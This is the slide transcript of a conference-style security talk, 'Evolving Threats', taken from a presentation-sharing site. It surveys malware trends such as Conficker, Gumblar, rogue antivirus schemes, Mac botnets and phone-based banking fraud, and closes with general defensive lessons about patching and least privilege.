Evolving threats
Download
1 / 29

Evolving Threats - PowerPoint PPT Presentation


  • 104 Views
  • Uploaded on

Evolving Threats. Paul A. Henry MCP+I, MCSE, CCSA, CCSE, CISSP-ISSAP, CISM, CISA, CIFI, CCE Florida PI License C2800597 Forensics & Recovery LLC Florida PI Agency License A2900048. Welcome To My World. Conficker update Risk of banking via cell phone rising Backdoor in a box

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' Evolving Threats' - ziva


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Evolving threats

Evolving Threats

Paul A. Henry

MCP+I, MCSE, CCSA, CCSE, CISSP-ISSAP, CISM, CISA, CIFI, CCE

Florida PI License C2800597

Forensics & Recovery LLC

Florida PI Agency License A2900048


Welcome to my world
Welcome To My World

  • Conficker update

  • Risk of banking via cell phone rising

  • Backdoor in a box

    • Covert channels on a budget

  • Obfuscation wins again

    • Adobe issues not going away

  • Wireless network tap

    • Sniffing a network from 300 meters

  • What’s that light at the end of the tunnel

    • Patch that Mac

  • Old Malware never dies


Conficker update
Conficker Update

  • Upgrades

    • No longer limited to 250 domains for updates

      • 50,000 domains

      • Peer to peer updates

      • Blocks access to larger range of security sites

    • First nefarious use of conficker bot net detected

      • More sure to come





Big money
Big Money

  • 1.8M unique users were redirected to the rogue Anti-Virus software during 16 consecutive days

  • Members of the affiliate network were rewarded for each successful redirection with 9.6 cents “a piece”, which totals

    $ 172,800 or $ 10,800 per day


Introducing gumblar son of conficker
Introducing Gumblar - Son of Conficker

  • In 2008 one website was compromised every 5 sec

    • Now it is one every 4.5 sec

  • End game is the same – deliver malware

  • Gumblar is building two botnets

    • First botnet is made up of compromised web servers and is used to distribute “drive-by” malware across web servers

    • Second botnet is made up of PCs that visit the web sites and become infected

      • These PCs become part of a spam spewing botnet


Introducing gumblar son of conficker1
Introducing Gumblar - Son of Conficker

  • Gumblar is now found on 42% of all discovered compromised websites


Root cause
Root Cause…

  • Really drives home the underlying problem with network security today..

  • One of the most successful vulnerabilities being exploited today is RDS (MDAC)

  • This one vulnerability is responsible for over 70% of compromises from automated toolkits

  • Did I mention that the vulnerability was patched 3 years ago……



Pinch lives on
Pinch Lives On…

  • Even while the authors sit in prison Pinch continues to infect users


It s not rocket science
It’s Not Rocket Science…

  • It is common knowledge that you can eliminate 90% of your risk by applying patches in a timely manner

  • It was recently reported by IBM that over 70% of Microsoft vulnerabilities in 2008 could be mitigated by simply enforcing the “rule of least privilege”


Now this is interesting
Now This Is Interesting…

  • For Sale Used Nokia 1100 $30,000

  • A software issue in the Nokia 1100 makes is easily re-programmable

    • Assume any identity

    • Actively being used in UK to capture banking PIN sent via SMS


Pogo plug backdoor in a box
Pogo Plug – Backdoor in a box

  • Allows anything connected via USB to be easily shared across the Internet

    • Hard drive

    • Ethernet adapter

    • Wireless adapter


Pogo plug backdoor in a box1
Pogo Plug – Backdoor in a box

  • Yes there are a few good uses but….









20 000 illegal downloads
20,000 Illegal Downloads….

  • Pirated copy of iWorks contained malware


First mac botnet
First Mac BotNet

  • First use of iBotnet was a DDoS Attack


First mac botnet1
First Mac BotNet

  • Apple is currently associated with 57 different software products and numerous hardware platforms

  • A search on reported vulnerabilities of OSX shows 128 Secunia Advisories and 866 reported Vulnerabilities

    • http://secunia.com/advisories/product/96/

      That light at the end of the tunnel is an

      on coming train…



Summary
Summary

  • We have yet to feel the impact of Conficker – more to come

  • Cell phones are becoming a viable target

  • Pogo Plug demonstrates the need to re evaluate access to 80/443 outbound

  • We need to rethink signatures the current model is doomed to fail

  • Wireless network taps will play a part in data leakage

  • Security by obscurity is over for Mac

  • Obfuscation brings new life to old malware


  • Forensics

  • & Recovery LLC

  • Florida PI License A 29004

  • www.forensicsandrecovery.com

  • Paul A. Henry

  • MCP+I, MCSE, CCSA, CCSE, CISSP-ISSAP, CISM, CISA, CIFI, CCE

  • Florida PI License C2800597

  • 25 SE 69th Place Ocala, Fl 34480 Telephone (954) 854 9143 [email protected]


ad